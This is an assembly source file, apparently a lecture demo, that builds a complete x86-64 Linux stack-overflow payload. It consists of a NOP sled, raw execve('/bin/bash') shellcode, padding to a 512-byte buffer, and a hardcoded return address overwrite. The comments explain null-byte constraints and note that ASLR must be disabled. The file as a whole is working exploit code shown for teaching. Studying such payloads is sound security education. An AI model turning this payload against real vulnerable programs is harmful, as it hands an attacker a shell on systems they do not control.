sfl-examples/lecture-demos/buffer-overflow/bufoverflow.shellcode.asm


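; Lecture demo: stack-overflow payload for x86-64 Linux (NASM, Intel syntax).
;
; Layout of the payload as emitted:
;   [0,   128)  NOP sled            - the corrupted return address must land anywhere in here
;   [128, ...)  execve("/bin/bash") - raw Linux syscall, no libc
;   ...         exit(0)             - reached only if execve fails
;   ...         "/bin/bash\0"       - the filename string, addressed RIP-relative
;   [?,   512)  padding (ALIGN 512) - fills the victim's buffer up to the saved frame
;   [512, 520)  fake saved rbp
;   [520, 528)  fake return address - points into the NOP sled above
;
; Delivery caveats:
;   * The bytes are NOT null-free (the string terminator, the 32-bit displacement in
;     `lea rdi, [rel binbash]` and the upper bytes of RET_ADDR all contain 0x00), so
;     the payload must reach the victim through a length-based read (read()/fread()),
;     not through strcpy()/gets()-style copying that stops at the first NUL.
;   * RET_ADDR is a fixed stack address. It is only meaningful with ASLR disabled
;     (randomize_va_space = 0) and for the exact victim binary/environment it was
;     measured in -- presumably under a debugger; re-measure before reuse.
;   * The buffer-to-saved-rbp distance is assumed to be exactly 512 bytes here
;     (hence ALIGN 512); a different victim needs a different padding size.

bits 64
global _start

SYS_EXECVE  equ 59                  ; execve(const char *filename, char *const argv[], char *const envp[])
SYS_EXIT    equ 60                  ; exit(int status)
RET_ADDR    equ 0x7fffffffdcd0      ; address inside the NOP sled on the victim's stack (see caveats)

_start:
        times 128 nop               ; NOP sled: any landing point slides into the execve below

        ; Linux syscall ABI: rax = number; args in rdi, rsi, rdx, r10, r8, r9.
        ; rsi/rdx (argv/envp) are NULL; Linux accepts that for a demo shell.
        ; NOTE(review): if the target complains about an empty argv, build
        ; argv = {rdi, 0} on the stack instead of passing NULL.
        mov     eax, SYS_EXECVE     ; 32-bit write zero-extends into rax
        lea     rdi, [rel binbash]  ; RIP-relative: works wherever the sled lands
        xor     esi, esi            ; argv = NULL
        xor     edx, edx            ; envp = NULL
        syscall                     ; does not return on success

        ; execve only comes back on failure (rax = -errno). Without this the CPU
        ; would fall through and execute the bytes of "/bin/bash" as code.
        mov     eax, SYS_EXIT
        xor     edi, edi            ; status = 0
        syscall

        times 5 nop                 ; small gap between code and data (layout kept from the original)
binbash:
        db      '/bin/bash', 0x00   ; NUL-terminated filename for execve

        ALIGN   512                 ; pad the whole payload out to the victim's saved-frame offset
        times 8 nop                 ; overwrites the saved rbp; value is irrelevant, we never return into the caller
        dq      RET_ADDR            ; overwrites the saved return address ([rbp+8]) -> jumps into the sled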